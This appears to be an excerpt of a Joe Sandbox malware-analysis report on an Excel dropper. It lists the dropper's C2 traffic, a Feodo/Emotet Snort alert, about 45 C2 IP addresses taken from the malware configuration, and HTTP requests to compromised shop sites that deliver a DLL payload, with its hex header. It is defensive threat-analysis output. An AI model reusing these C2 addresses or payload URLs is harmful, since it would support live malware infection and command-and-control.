                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 163.172.115.127:80
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 163.172.108.69:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
                      Source: excel.exeMemory has grown: Private usage: 4MB later: 32MB

                      Networking

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 218.38.121.17 443
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2404328 ET CNC Feodo Tracker Reported CnC Server TCP group 15 192.168.2.22:49178 -> 218.38.121.17:443
                      Outdated Microsoft Office dropper detected
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDNS query: sat7ate.com is down
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorIPs: 218.38.121.17:443
                      Source: Malware configuration extractorIPs: 186.250.48.5:443
                      Source: Malware configuration extractorIPs: 80.211.107.116:8080
                      Source: Malware configuration extractorIPs: 174.138.33.49:7080
                      Source: Malware configuration extractorIPs: 165.22.254.236:8080
                      Source: Malware configuration extractorIPs: 185.148.169.10:8080
                      Source: Malware configuration extractorIPs: 62.171.178.147:8080
                      Source: Malware configuration extractorIPs: 128.199.217.206:443
                      Source: Malware configuration extractorIPs: 210.57.209.142:8080
                      Source: Malware configuration extractorIPs: 36.67.23.59:443
                      Source: Malware configuration extractorIPs: 160.16.143.191:8080
                      Source: Malware configuration extractorIPs: 128.199.242.164:8080
                      Source: Malware configuration extractorIPs: 178.238.225.252:8080
                      Source: Malware configuration extractorIPs: 118.98.72.86:443
                      Source: Malware configuration extractorIPs: 202.134.4.210:7080
                      Source: Malware configuration extractorIPs: 82.98.180.154:7080
                      Source: Malware configuration extractorIPs: 54.37.228.122:443
                      Source: Malware configuration extractorIPs: 64.227.55.231:8080
                      Source: Malware configuration extractorIPs: 195.77.239.39:8080
                      Source: Malware configuration extractorIPs: 103.254.12.236:7080
                      Source: Malware configuration extractorIPs: 103.85.95.4:8080
                      Source: Malware configuration extractorIPs: 178.62.112.199:8080
                      Source: Malware configuration extractorIPs: 83.229.80.93:8080
                      Source: Malware configuration extractorIPs: 114.79.130.68:443
                      Source: Malware configuration extractorIPs: 51.75.33.122:443
                      Source: Malware configuration extractorIPs: 139.196.72.155:8080
                      Source: Malware configuration extractorIPs: 188.165.79.151:443
                      Source: Malware configuration extractorIPs: 190.145.8.4:443
                      Source: Malware configuration extractorIPs: 196.44.98.190:8080
                      Source: Malware configuration extractorIPs: 198.199.70.22:8080
                      Source: Malware configuration extractorIPs: 103.56.149.105:8080
                      Source: Malware configuration extractorIPs: 104.244.79.94:443
                      Source: Malware configuration extractorIPs: 87.106.97.83:7080
                      Source: Malware configuration extractorIPs: 103.71.99.57:8080
                      Source: Malware configuration extractorIPs: 46.101.98.60:8080
                      Source: Malware configuration extractorIPs: 103.126.216.86:443
                      Source: Malware configuration extractorIPs: 103.224.241.74:8080
                      Source: Malware configuration extractorIPs: 37.44.244.177:8080
                      Source: Malware configuration extractorIPs: 85.214.67.203:8080
                      Source: Malware configuration extractorIPs: 202.28.34.99:8080
                      Source: Malware configuration extractorIPs: 175.126.176.79:8080
                      Source: Malware configuration extractorIPs: 85.25.120.45:8080
                      Source: Malware configuration extractorIPs: 93.104.209.107:8080
                      Source: Malware configuration extractorIPs: 103.41.204.169:8080
                      Source: Malware configuration extractorIPs: 78.47.204.80:443
                      Source: Malware configuration extractorIPs: 139.59.80.108:8080
                      Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                      Source: Joe Sandbox ViewASN Name: EcobandGH EcobandGH
                      Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                      Source: Joe Sandbox ViewJA3 fingerprint: 8c4a22651d328568ec66382a84fc505f
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: QIerciqTmKVMTalY=ZNu1qVV4648TLcWc9PPurZOk8Euzv2esBBYSgK+0qI7gqkg7BYL3F0mCxQgzQRyD5wFY7LKdM3+m6rzAWA7DM0zlGdOu9mA+uitu6Au4yztsyCFHh5OpKU22gqXtPhtVuPee01EQS+Zfbc11xfPG5H+RbXgi6TGtiNnVWQj9vku1x5cT4DQp5DbsaxbTUVxBqIRQ6Zp9JoWXziesjQBhwb098hRQoA==Host: 218.38.121.17
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: SoHpbOHll=S1ZaEV/2K+G2MuFR5aWJIrFZWKJ6BUgx2VARY+iQICyCR3IjoBJq+ugHbhYuoa/1EyVyNWv+NFsl7eeESQnqDpazHNIhxXrZoY/Vuf2vmUqGl6dUPaa4tJ0lwsWfZmrxJ7pEDSggisnX+azuZvVEIAxjw6MoQMrIX6LHhpMhUlw6eJmGasOFasTPM8tRLJgpALsu1FrL12a9RO9cEVaRDYWnxpnpdi1nRvXITNoIrml15gO1b66MMFvst35GgkHSH4wY0dfE/LeROelUM6svgfP9p8M/xbXjvu2jNncQnCwlRNDoB1qZ0If0i6ltN2YsK7d/Host: 218.38.121.17
                      Source: Joe Sandbox ViewIP Address: 188.165.79.151 188.165.79.151
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 15 Nov 2022 11:40:12 GMTContent-Type: application/x-msdownloadContent-Length: 769024Connection: keep-aliveX-Powered-By: PHP/7.3.0Set-Cookie: 63737a9ce6e7a=1668512412; expires=Tue, 15-Nov-2022 11:41:12 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Tue, 15 Nov 2022 11:40:12 GMTExpires: Tue, 15 Nov 2022 11:40:12 GMTContent-Disposition: attachment; filename="40hd04O0.dll"Content-Transfer-Encoding: binaryData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a8 d9 25 ba ec b8 4b e9 ec b8 4b e9 ec b8 4b e9 9a 25 26 e9 eb b8 4b e9 cb 7e 36 e9 e7 b8 4b e9 cb 7e 26 e9 43 b8 4b e9 9a 25 30 e9 fb b8 4b e9 ec b8 4a e9 f8 ba 4b e9 cb 7e 25 e9 76 b8 4b e9 cb 7e 31 e9 ed b8 4b e9 cb 7e 33 e9 ed b8 4b e9 52 69 63 68 ec b8 4b e9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 b6 15 64 63 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 08 00 00 5a 05 00 00 5e 06 00 00 00 00 00 60 23 03 00 00 10 00 00 00 00 00 10 00 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 60 0c 00 00 04 00 00 a8 56 0c 00 02 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 30 f8 0a 00 4f 00 00 00 50 d5 0a 00 dc 00 00 00 00 10 0c 00 b0 00 00 00 00 a0 0b 00 7c 65 00 00 00 00 00 00 00 00 00 00 00 20 0c 00 c4 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 05 00 10 0b 00 00 b0 d4 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 59 05 00 00 10 00 00 00 5a 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7f 88 05 00 00 70 05 00 00 8a 05 00 00 5e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 70 9d 00 00 00 00 0b 00 00 3a 00 00 00 e8 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 7c 65 00 00 00 a0 0b 00 00 66 00 00 00 22 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 b0 00 00 00 00 10 0c 00 00 02 00 00 00 88 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 6c 30 00 00 00 20 0c 00 00 32 00 00 00 8a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$%KKK%&K~6K
                      Source: unknownHTTPS traffic detected: 218.38.121.17:443 -> 192.168.2.22:49178 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 218.38.121.17:443 -> 192.168.2.22:49179 version: TLS 1.0
                      Source: global trafficHTTP traffic detected: GET /Adapter/moycMR/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.spinbalence.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /index.php?controller=404 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.spinbalence.comConnection: Keep-AliveCookie: PrestaShop-7318ab2db5e4a3c3a59fb8879ad22162=Nw04PzmYYXL6IgJsn1ERim4S4YpS6Ls6dHZki%2FijBePykYJIX2P7PO%2Fz2gyuaY7ukuFjkghLJ9VD2B347P4foDXH3WhaK5EtQkBaO4YrzSE%3D000075
                      Source: global trafficHTTP traffic detected: GET /Content/Afa1PcRuxh/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.3d-stickers.comConnection: Keep-AliveCookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=9ybostxWPod7nP43PifVMXkPdOrv4EO5U%2FKqPmWtgSFI2Ckr%2B1t%2BqGSwMBMouqmkFK0SD2XdZ7Cg5qtQQ9RwtkOJ6mVwbNsm9NO1rvVxNh8%3D000079
                      Source: global trafficHTTP traffic detected: GET /page-non-trouvee HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.3d-stickers.comConnection: Keep-AliveCookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=9ybostxWPod7nP43PifVMXkPdOrv4EO5U%2FKqPmWtgSFolWp%2F7SQd8f90S8O%2FCwGohxkvf3iPluWhTbyznpM1hokG52ER60fuMOhd0m7WY6E%3D000075
                      Source: global trafficHTTP traffic detected: GET /Adapter/moycMR/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.spinbalence.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /Content/Afa1PcRuxh/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.3d-stickers.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bsavxiv/axHQYKl/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: navylin.comConnection: Keep-Alive
                      Source: unknownNetwork traffic detected: IP country count 21
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49179
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49178
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49178 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49179 -> 443
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Nov 2022 11:40:10 GMTServer: Apache/2.4.46 (FreeBSD) OpenSSL/1.0.2u-freebsdStrict-Transport-Security: max-age=63072000; includeSubDomainsX-Frame-Options: SAMEORIGINX-UA-Compatible: IE=edge,chrome=1P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"Powered-By: PrestaShopStatus: 404 Not FoundSet-Cookie: PrestaShop-7318ab2db5e4a3c3a59fb8879ad22162=Nw04PzmYYXL6IgJsn1ERim4S4YpS6Ls6dHZki%2FijBePykYJIX2P7PO%2Fz2gyuaY7u4EN7ldFY91oSo8hffAyJadQKSdMuXRfEPnyOP0LrcMPyEqQYzhnB8nK%2F56PKGV92LhwlADR0Cai9xEpKkyPgYTgxlYN3LtX9AYwD4O0bLpA%3D000115; expires=Mon, 05-Dec-2022 11:40:10 GMT; Max-Age=1728000; path=/; domain=www.spinbalence.com; secure; httponly;HttpOnly;SecureConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Nov 2022 11:40:11 GMTServer: Apache/2.4.46 (FreeBSD) OpenSSL/1.0.2u-freebsdStrict-Transport-Security: max-age=63072000; includeSubDomainsX-Frame-Options: SAMEORIGINX-UA-Compatible: IE=edge,chrome=1P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"Status: 404 Not FoundSet-Cookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=9ybostxWPod7nP43PifVMXkPdOrv4EO5U%2FKqPmWtgSFolWp%2F7SQd8f90S8O%2FCwGo94XM8kzh2wgRtGRJ9nsrSftoVdV7kvSqSpdfLt4fdwNPMCppuBx0MZGFj5jTVvcGNOjxE63v9YLetElu6JEvu5ONuoJotfg%2BX0z1PXLVMbs%3D000115; expires=Mon, 05-Dec-2022 11:40:11 GMT; Max-Age=1728000; path=/; domain=www.3d-stickers.com; httponly;HttpOnly;SecureConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8
                      Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                      Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                      Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                      Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                      Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                      Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                      Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                      Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                      Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                      Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                      Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                      Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                      Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                      Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                      Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                      Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                      Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                      Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                      Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                      Source: regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: regsvr32.exe, 00000009.00000002.1210992650.0000000002FC0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                      Source: regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                      Source: regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                      Source: regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                      Source: regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                      Source: regsvr32.exe, 00000009.00000002.1210992650.0000000002FC0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                      Source: regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                      Source: regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                      Source: regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                      Source: regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                      Source: regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                      Source: regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                      Source: regsvr32.exe, 00000009.00000002.1210719728.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151539423.00000000003ED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1151610020.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1210653343.00000000002FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
